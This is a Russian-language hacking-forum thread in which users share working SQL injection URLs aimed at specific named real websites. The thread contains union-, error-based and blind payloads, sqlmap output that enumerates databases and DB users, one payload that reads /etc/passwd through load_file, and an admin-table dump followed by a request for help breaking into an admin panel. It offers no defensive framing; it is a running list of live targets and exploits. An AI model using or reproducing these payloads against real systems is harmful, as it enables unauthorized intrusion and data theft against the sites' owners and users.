SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    170
    Likes Received:
    249
    Reputations:
    29
    target: http://atmarine.fi
    type: Error-Based
    user: w8400337db@10.0.8.89
    db: 5.5.51-MariaDB
    Code:
    http://atmarine.fi/index.php?id=2 AND (SELECT 2796 FROM(SELECT COUNT(*),CONCAT_WS(CHAR(32,58,32),user(),database(),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
    target: http://www.ubraintv.com

    type: Union-Based
    user: ubraintv@localhost
    db: 5.1.73 MySQL

    Code:
    http://www.ubraintv.com/watchchannel.php?id=6' UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7-- -
     
  2. Dri-M

    Dri-M New Member

    Joined:
    25 Nov 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    www.yorgasmic.com/article.php?id=148


    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=148 AND 3436=3436
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=148 OR (SELECT 2443 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2443=2443,1))),0x7178706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=148 AND SLEEP(5)
    ---
     
    palec2006 likes this.
  3. Vip77

    Vip77 Banned

    Joined:
    29 Sep 2012
    Messages:
    335
    Likes Received:
    54
    Reputations:
    20
    ALEXA 12,361

    Code:
    http://singtao.ca/events/Thatcher/article.php?ID=1+union+all+select+null,null,null,load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
     
    #183 Vip77, 10 Dec 2017
    Last edited by a moderator: 11 Dec 2017
  4. Dri-M

    Dri-M New Member

    Joined:
    25 Nov 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    http://www.aseanmarketplace.net/featured-listings.php?id=
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: id=-2582 OR 5132=5132
    
        Type: AND/OR time-based blind
        Title: MySQL time-based blind - Parameter replace (MAKE_SET)
        Payload: id=MAKE_SET(8180=8180,SLEEP(5))
    ---
    available databases [2]:
    [*] amp
    [*] information_schema

    Table: admin
    [1 entry]
    +----+----------+----------------------------------+
    | id | username | password |
    +----+----------+----------------------------------+
    | 1 | читаем | первый пост |
    +----+----------+----------------------------------+


    в админпанельку как бы попасть в /administrator не пускает...

    как быть - мож кто подскажет....
     
    #184 Dri-M, 11 Dec 2017
    Last edited by a moderator: 11 Dec 2017
  5. sepo

    sepo New Member

    Joined:
    21 Jan 2017
    Messages:
    30
    Likes Received:
    3
    Reputations:
    1
    Code:
    http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14--
    Code:
    http://www.jmtv.com/news.php?id=-3+union+select+1,version(),database()--
     
    #185 sepo, 16 Dec 2017
    Last edited by a moderator: 17 Dec 2017
  6. sepo

    sepo New Member

    Joined:
    21 Jan 2017
    Messages:
    30
    Likes Received:
    3
    Reputations:
    1
    Code:
    http://plasticospardo.com/english/noticias.php?id=-16+union+select+1,2,version(),4,database(),user(),7--
     
  7. BabaDook

    BabaDook Banned

    Joined:
    9 May 2015
    Messages:
    799
    Likes Received:
    1,014
    Reputations:
    23
    PHP:
    http://manul.tv/watch_video.php?v=R6DW4G16RRS8%27+and+false+union+select+database(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+--+-
     
    Triton_Mgn likes this.
  8. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    170
    Likes Received:
    249
    Reputations:
    29
    target: http://illan-gifts.ru
    type:
    Error-Based
    user: wapp@localhost
    version: 5.5.52-MariaDB

    Code:
    http://illan-gifts.ru/1'and(ExtractValue(1,concat(0x5c,(user()))))and'
     
  9. qwaszx000

    qwaszx000 Member

    Joined:
    10 Feb 2018
    Messages:
    18
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://www.jamestrussart.com/gallery.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11
    Выводится 2 номер.
     
    #189 qwaszx000, 13 Mar 2018
    Last edited: 13 Mar 2018
    Jerri likes this.
  10. sepo

    sepo New Member

    Joined:
    21 Jan 2017
    Messages:
    30
    Likes Received:
    3
    Reputations:
    1
    Code:
    https://c2-europe.eu/news-full.php?id=-1049+union+select+1,2,3,version(),5,6,database(),8,9,10,user(),12,13,14--
    Code:
    http://monroerec.com/event.php?id=-24%27+UnIOn+SeLEcT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
     
    #190 sepo, 10 Jul 2018
    Last edited by a moderator: 10 Jul 2018
  11. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    117
    Likes Received:
    16
    Reputations:
    0
    Code:
    https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails
    Parameter: appname (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: appname=Emails' AND 8893=8893-- ZiPX
    ---
    [12:48:01] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5
    available databases [5]:
    [*] information_schema
    [*] mysql
    [*] pbcomput_swym
    [*] performance_schema
    [*] sys
    
     
Loading...